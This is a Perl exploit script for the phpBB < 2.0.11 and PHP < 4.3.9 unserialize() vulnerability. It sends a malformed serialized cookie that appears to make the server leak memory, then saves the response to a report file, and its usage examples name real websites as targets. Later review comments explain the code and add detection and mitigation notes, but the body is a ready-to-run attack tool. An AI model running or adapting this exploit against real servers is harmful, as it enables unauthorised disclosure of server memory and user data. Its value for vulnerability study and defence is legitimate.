Phpbb < 2.011 and php < 4.39 unserialize () exploit //phpbb.pl cosoft.org.cn 80 /html/forum/ 30000 phpbb2mysql
//30000 is the memory size, phpbb2mysql is the cookie
#!/usr/bin/perl
#Phpbb < 2.011 &php < 4.39 unserialize () exploit
#Code by Alpha(netsh@163.com)
#qq:24266683
#Welcom To Http://www.cnwill.com/
use IO::Socket;
# Top-level driver: builds one HTTP GET carrying a crafted phpBB cookie, sends
# it through connect(), post-processes the raw response and appends the result
# to report.txt.
# NOTE(review): the file has no `use strict` / `use warnings`; every variable
# below is a package global, and connect() reads $host, $port and $req directly.
# `cls` is a Windows console command; on other shells this call just fails.
system('cls');
# Exactly five positional arguments are required; otherwise print usage and exit.
if (@ARGV != 5) {
print "\n";
print "*****************************************************\n";
print "Thanks use this programme\n";
print "This is Phpbb < 2.011 &php < 4.39 unserialize () exploit.\n\n";
print "Use:\n$0 host port path buffersize cooike\n\n";
print "e.g :\n$0 www.cnwill.com 80 /html/forum/ 30000 phpbb2mysql\n\n";
print "Code by Alpha\n";
print "*****************************************************\n";
exit(1);
}
# NOTE(review): @ARGV[n] is a one-element array slice, not a scalar lookup; it
# yields the same value here but warns under `use warnings` ($ARGV[n] is the
# scalar form). None of the five values is validated before use.
$host = @ARGV[0];
$port = @ARGV[1];
$path = @ARGV[2];
$size = @ARGV[3];
$cookie=@ARGV[4];
#$host="www.cosoft.org.cn";
# The request. The "<cookie>_data" value is a URL-encoded PHP serialized string,
# s:$size:"test1"; -- its declared length is the caller-supplied $size while the
# quoted literal is only 5 bytes long. Presumably that length mismatch is what
# the unserialize() issue named in the file header relies on.
# Detection notes for log/WAF review, all visible in this request:
#   - a phpBB *_data cookie whose s:<len> does not match the quoted string length
#   - two separate Cookie headers carrying response-style attributes
#     (expires / path / domain), which browsers do not send
#   - a fixed *_sid value together with "Accept-Language: fr" and an MSIE 6.0 UA
# Mitigation: run phpBB and PHP releases at or above the versions named in the
# header, and do not pass client-controlled cookie data to unserialize().
$req = "GET $path HTTP/1.1\n".
"Host: $host\n".
"Cookie: $cookie"."_data=s:$size:%22test1%22%3b; expires=Fri, 24-Dec-2005 21:25:37 GMT; path=/; domain=$host\n".
"Cookie: $cookie"."_sid=1cfd759c33ba2a45b994c7b7cfd948ec; path=/; domain=$host\n".
"Accept-Language: fr\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n".
"Connection: close\n\n";
# Debug aid left by the author: dump the request and stop.
#print "$req";
#exit;
print "######Waitting...........\n\n";
# The & sigil selects the user-defined sub below rather than Perl's built-in
# connect(); called without parentheses it passes the (empty) current @_.
@res = &connect;
# Flatten the response lines into one string.
$aaa =join ('',@res);
# Keep 2*$size characters starting at the fixed offset 360.
# NOTE(review): 360 is hard-coded; presumably it skips the response headers --
# confirm, since header length varies by server.
$aaa=substr ($aaa,360, 2*$size);
# Replace every URL-encoded byte (%XX) with a dot, then collapse runs of dots.
# The order of these substitutions matters; each pass is non-overlapping.
$aaa=~s/%../\./g;
$aaa=~s/\.\.\.\./\./g;
$aaa=~s/\.\.\./\./g;
$aaa=~s/\.\.\./\./g;
$aaa=~s/\.\./\./g;
$aaa=~s/\.\./\./g;
# A "dot, any char, dot, any char" sequence becomes a line break; doubled
# newlines are then squeezed twice.
$aaa=~s/\..\../\n/g;
$aaa=~s/\n\n/\n/g;
$aaa=~s/\n\n/\n/g;
# NOTE(review): bareword handle, two-argument open in append mode, and the
# return value is not checked -- if the open fails the output is silently lost.
# The file holds whatever the server returned, so treat report.txt as
# potentially sensitive data.
open(file,">>report.txt");
print file $aaa;
close(file);
# The result can be large, so it is written to a file instead of the console.
print "ok,the result is in the report.txt,you can see it now!\n\n";
print "*****************************************************\n";
# Open a TCP connection to $host:$port, send the prebuilt request held in $req,
# and return the response as a list of lines. $host, $port and $req are the
# file-level globals set by the driver code above. Dies if the socket cannot
# be created.
sub connect {
    my $sock = IO::Socket::INET->new(
        PeerAddr => $host,
        PeerPort => $port,
        Proto    => "tcp",
    );
    die "Sorry! Could not connect to $host \n" unless $sock;

    print {$sock} $req;

    # List-context readline: collects every line until the peer closes.
    my @lines = <$sock>;
    close $sock;

    return @lines;
}